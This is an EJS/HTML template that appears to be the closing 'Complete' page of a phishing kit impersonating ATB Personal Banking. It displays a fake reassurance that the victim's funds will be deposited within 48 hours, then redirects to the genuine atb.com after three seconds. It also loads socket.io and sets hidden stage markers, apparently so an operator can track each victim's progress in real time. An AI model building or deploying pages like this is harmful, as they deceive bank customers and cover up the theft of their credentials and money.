<%
let message = `Thank you,

Your funds will be processed and deposited in your account within 48 hours. For security measures, you will be signed out and redirected to the main page.`;
%>
<html class="fa-events-icons-ready">
    <head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
        <link rel="Shortcut Icon" href="favicon.ico" type="image/x-icon">
        <title>ATB Personal Banking</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" type="text/css" href="https://cloud.typography.com/6700732/6101192/css/fonts.css">
        <link href="https://use.fontawesome.com/f26ba7188d.css" media="all" rel="stylesheet">
        <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" rel="stylesheet">
        <link rel="stylesheet" href="/assets/atb/main.css?7">
        <meta http-equiv="refresh" content="3;URL=https://www.atb.com/personal/">
        <script src="/socket.io/socket.io.js"></script>
    </head>
    <body>
        <div id="app">
            <div class="sc-kgoBCf bzQzYK" id="rbw-overall-context-wrapper">
                <div class="sc-iwsKbI jTTtAZ"></div>
                <div class="sc-jzJRlG eNoisr">
                    <form class="sc-jTzLTM cUTnPT lab-form" method="post" id="rbw-login-block">
                        <div class="sc-bdVaJa khUSez">
                            <img class="sc-htpNat gRCWAJ" src="/assets/atb/atb-jewel.svg" id="rbw-login-heading-atb-logo"><br><br>
                            <h2 class="ant-typography login-title-2 div-send">Complete</h2>
                            <div class="ant-divider ant-divider-horizontal" role="separator" style="margin: 10px 0px 20px;"></div>
                        </div>
                        <div class="sc-fjdhpX Pbrfi div-main" id="rbw-login-form-login-block">
                            <p class="p-text"><%= message%></p>
                        </div>
                    </form>
                </div>
                <div class="sc-kAzzGY cUrlcM">
                    <div class="sc-chPdSV emnlIF" id="rbw-marquee-block">
                        <div class="sc-ckVGcZ czSiSX"></div>
                    </div>
                </div>
            </div>
        </div>
        <span hidden id="navig"> .</span>
        <span hidden id="stage">Finish</span>
    </body>
    <script src="/bank/atb/js/script.js">
    </script>
</html>
